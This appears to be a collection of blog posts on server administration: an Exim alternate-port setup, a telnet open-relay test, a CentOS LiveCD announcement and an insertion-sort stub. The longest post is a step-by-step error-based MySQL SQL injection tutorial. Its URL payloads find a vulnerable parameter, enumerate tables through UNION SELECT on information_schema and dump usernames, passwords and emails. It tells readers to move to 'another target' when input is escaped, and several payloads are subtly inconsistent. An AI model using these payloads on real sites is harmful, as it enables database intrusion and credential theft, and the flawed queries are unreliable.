Exim alternate port 587

Nowadays, most of the ISP’s are blocking the port 25 case that can be simply tested by establishing a telnet connection on port 25:

$ telnet dragos.fedorovici.com 25
Trying 67.210.111.70…
telnet: Unable to connect to remote host: Connection timed out

If you see the above error message, your ISP is very likely blocking the ability to send mail through servers other than theirs. Over the last few years, more and more ISP’s have started to require their subscribers to use their SMTP server to send mail. This allows them to monitor spammers, and to reduce to the overwhelming amounts of spam and exploitation that occurs daily with email. You may want to contact your ISP to see if they are willing to work with you on this issue or try port 587 or 26 which may be opened.

When it comes to your server, if you are running Exim as the default MTA on your server, you can bypass this block from different ISP’s, by opening an alternate port for Exim. and allowing your clients to use this port for outgoing SMTP. For this you will need to edit the configuration file of Exim (usually /etc/exim.conf) and add a similar line to the configuration file:

daemon_smtp_ports = 25 : 587

Restart the mail server and you should be able to bypass the restriction added by your ISP:

$ telnet dragos.fedorovici.com 587
Trying 67.210.111.70…
Connected to dragos.fedorovici.com.
Escape character is ‘^]’.
220-torch.lunarmania.com ESMTP Exim 4.69 #1 Wed, 07 Dec 2011 13:32:08 -0800
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
^]

telnet>

Open Relay test

An Open Relay is an SMTP server that allows 3rd party relay of e-mail messages. By processing mail that is neither for nor from a local user, an open relay makes it possible for an unscrupulous sender to route large volumes of unsolicited emails. While they are a large number of online tools that would verify if your mail server is an open relay, for those that prefer testing this manually, this can be done by establishing a telnet connection on port 25 and trying to send a message, without authentication:

# telnet 85.204.103.34 25
Trying 85.204.103.34…
Connected to 85.204.103.34.
Escape character is ‘^]’.
220 server.auxell.ro
helo client.auxell.ro
250 server.auxell.ro
mail from: dragos.fedorovici@google.com
250 2.1.0 Ok
rcpt to: dragos.fedorovici@gmail.com
554 5.7.1: Relay access denied

If you are receiving a similar message then you’re mail server is secured (at list from this point of view). I will detail below the commands that are used in the above example:

helo – the client sends this command to the SMTP server to identify itself and initiate the SMTP conversation. The domain name or IP address of the SMTP client is usually sent as an argument together with the command (e.g. “HELO client.example.com”). If a domain name is used as an argument with the HELO command, it must be a fully qualified domain name.

mail from – specifies the e-mail address of the sender. This command also tells the SMTP server that a new mail transaction is started. If the senders e-mail address is accepted the server will reply with the 250 OK code.

rcpt to – specifies the e-mail address of the recipient. This command can be repeated multiple times for a given e-mail message in order to deliver a single e-mail message to multiple recipients.

CentOS-6.0 is here

The CentOS Development team is pleased to announce the availability of the CentOS LiveCD 6.0 for both i386 and x86_64 architectures. These LiveCD are based on CentOS-6.0 i386 and x86_64 distributions.

The CentOS-6.0 LiveCD is meant to be a Linux environment suited to be run directly from either CD media or USB storage devices. It does not need any persistent storage on a machine, which also makes it a suitable recovery environment.

Due to space constraints, it was not possible for them to include all the traditional desktop applications on the LiveCD. However you can though enjoy a Gnome basic desktop, view and modify pictures with gthumb and the Gimp, browsing the web with Firefox, send emails with Thunderbird and connect to your favorite Instant Messaging network with Pidgin.

The CentOS-6.0 LiveCD is released to all external mirrors and available for download now. List of mirrors is available at these urls :

http://isoredirect.centos.org/centos/6/isos/i386/
http://isoredirect.centos.org/centos/6/isos/x86_64/

SQL Injection

NOTE: INTENDED FOR EDUCATIONAL PURPOSE ONLY. 

How to exploit the MySQL injection vulnerability (error bases SQL injection):

1st step: CHECKING FOR A VULNERABILITY

Suppose we have website like this:

http://www.site.com/script.php?id=21

To test this URL, we add a quote to it ‘

http://www.site.com/script.php?id=21′

On executing it, if we get an error like this: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near ‘\” at line 1
“, that means that the target is vulnerable to SQL injections.

If the error message returned is similar to this one: Warning: mysql_real_escape_string(): supplied argument is not a valid MySQL result resource in [file] at [line], then you will need to look for another target as you won’t be able to do SQL injections on that script.

What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Basically, it will replace those troublesome quotes (‘) a user might enter with a MySQL-safe substitute, an escaped quote \’.

2nd step: FINDING THE COLUMNS

To find number of columns we use statement ORDER BY (tells to the database how to order the result). In order to use, we do increment until we get an error. Like:

http://www.site.com/script.php?id=21 order by 1 <– no error

http://www.site.com/script.php?id=21 order by 2 <– no error

http://www.site.com/script.php?id=21 order by 3 <– no error

http://www.site.com/script.php?id=21 order by 4 <– no error

http://www.site.com/script.php?id=21 order by 5 <– error

// you get message like this: Unknown column ‘5’ in ‘order clause’)

This means that it has 4 columns, cause we got an error for column 5.

3rd step: CHECKING THE FUNCTIONALITY OF THE UNION FUNCTION

The next step is to check the functionality of the union function. This is because using this function we can select more data in one statement only. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,4
//we already know the number of columns from step 2

If we see some numbers on screen, i.e. 1 or 2 or 3 or 4 that means the UNION works.

4th step: CHECKING THE MySQL VERSION

The first information that we will retrieve is the MySQL version. Lets us assume that while checking for the functionality of the union function, we got number 4 on the screen. So for detecting the version, we will replace number 4 of our query with @@version or version(). Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,@@version

If you get an error union + illegal mix of collations (IMPLICIT + COERCIBLE), we need a convert() function. So for this you may use hex() and unhex():

http://www.site.com/script.php?id=21 union all select 1,2,3,unhex(hex(@@version))

LAST STEP: TABLE(S) AND COLUMN(S) NAME(S)

If the version used on the server is MySQL >=5.x, we will use the information_schema database (this database holds all the tables and columns). So to get it, we use table_name and information_schema. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,table_name from information_schema.tables

Here we replace the our number 4 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add
LIMIT to the end of query to list out each table. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,4table_name from information_schema.tables limit 0,1

Now to view the second table, we change limit 0, 1 to limit 1, 1 (the second table is displayed):

http://www.site.com/script.php?id=21 union all select 1,2,table_name from information_schema.tables limit 1,1

For third table we use limit 2,1:

http://www.site.com/script.php?id=21 union all select 1,2,table_name from information_schema.tables limit 2,1

Keep incrementing until you get some useful like db_admin, auth, auth_user, login_username, login_password etc.

To get the column names the method is the same. Here we use column_name and information_schema.columns. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,column_name from information_schema.columns limit 0,1

The first column name is displayed. For second column we will change the limit for 0,1 to 1,0 and so on. If you want to display column names for specific table use where clause: let us assume that we have found a table ‘user’. Example:

http://www.site.com/script.php?id=21 union all select 1,2,3,column_name from information_schema.columns where table_name=’users’

Note: that this won’t work if the magic quotes is ON.

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Let’s say that we found columns user, pass and email. Now to complete query to put them all together using concat():

http://www.site.com/script.php?id=21 union all select 1,2,3,concat(user,0x3a,pass,0x3a,email) from users

Note: 0x3a is hex value for colon.

The result is user:pass:email from table users!

Insertion sort algorithm

Insertion sort is a simple sorting algorithm: a comparison sort in which the sorted array/list is built one entry at a time. It is much less efficient on large lists than more advanced algorithms such as quicksort, heapsort or merge sort. Created for educational purpose , please check this video that explains the entire algorithm:

Enjoy!